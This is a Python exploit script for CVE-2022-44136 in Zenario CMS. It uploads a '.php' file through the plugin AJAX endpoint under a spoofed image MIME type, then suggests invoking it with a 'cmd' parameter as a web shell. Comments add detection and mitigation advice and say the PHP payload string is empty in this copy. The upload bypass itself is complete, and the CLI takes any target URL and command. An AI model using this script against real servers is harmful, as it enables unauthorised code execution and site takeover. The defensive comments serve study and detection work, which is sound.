#!/usr/bin/env python3
# CVE-2022-44136 Exploit - Zenario CMS Arbitrary File Upload
# Author: Ch35h1r3c47 (https://github.com/Ch35h1r3c47)
#
# What the script shows: one multipart POST to the Zenario plugin AJAX
# endpoint in which the uploaded part has a ".php" filename but declares
# the content type "image/svg+xml". The part's Content-Type is chosen by
# the client, so a server that trusts it in place of checking the file
# extension can be made to store a server-executable file.
#
# Detection: in web server / WAF logs, look for POSTs to /zenario/ajax.php
# whose query string contains "fileUpload" and whose multipart part has a
# script extension (.php and similar) paired with an image content type.
# Mitigation: decide the file type server-side from an extension allow-list
# and the file content, never from the client-supplied Content-Type; keep
# the upload directory non-executable; apply the vendor fix for
# CVE-2022-44136.
import requests
import sys
import argparse
import urllib3

# Disable warnings for self-signed certificates
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit(target_url, command):
    """Send a single file-upload request to a Zenario instance and print the reply.

    The request posts one multipart part named ``Filedata`` with the
    filename ``debug_module.php`` and the declared MIME type
    ``image/svg+xml``. According to the original author's comment, the
    vulnerability is an extension check that is bypassed by that spoofed
    MIME type.

    Args:
        target_url: Base URL of the instance; a trailing slash is stripped
            before the endpoint path is appended.
        command: Only interpolated into the printed "Suggested test" line.
            This function never sends it to the server.

    Returns:
        None. All results are written to stdout.
    """
    upload_path = "/zenario/ajax.php?method_call=handlePluginAJAX&cID=1&slideId=0&cType=html&instanceId=20&fileUpload"
    url = target_url.rstrip('/') + upload_path

    filename = "debug_module.php"

    # The original listing labels this "PHP payload to execute system
    # commands via 'cmd' GET parameter". In this copy the string is empty
    # (presumably lost when the page was extracted), so the uploaded file
    # has no content.
    payload = f""

    # Multipart body: (filename, content, declared content type). The
    # mismatch between the .php extension and the image MIME type is the
    # whole point of the request and the easiest thing to alert on.
    files = {'Filedata': (filename, payload, 'image/svg+xml')}

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Uploading malicious file: {filename}")

    try:
        # verify=False: the TLS certificate is not checked, so the peer
        # that answers is not authenticated.
        response = requests.post(url, files=files, verify=False, timeout=15)
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return

    if response.status_code != 200:
        print(f"[-] Upload failed. Status Code: {response.status_code}")
        return

    # HTTP 200 only means the endpoint answered; whether a file was stored
    # has to be read from the response body printed below.
    rule = "-" * 30
    print("[+] Request sent successfully.")
    print("[+] Server Response:")
    print(rule)
    print(response.text)
    print(rule)
    print("[!] Check the server response for the uploaded file path.")
    print(f"[*] Suggested test: /path/to/uploaded/{filename}?cmd={command}")


if __name__ == "__main__":
    cli = argparse.ArgumentParser(description="Exploit PoC for CVE-2022-44136")
    cli.add_argument("-u", "--url", required=True, help="Target Base URL (e.g., http://target.com)")
    cli.add_argument("-c", "--cmd", default="whoami", help="Command to execute (default: whoami)")
    opts = cli.parse_args()
    exploit(opts.url, opts.cmd)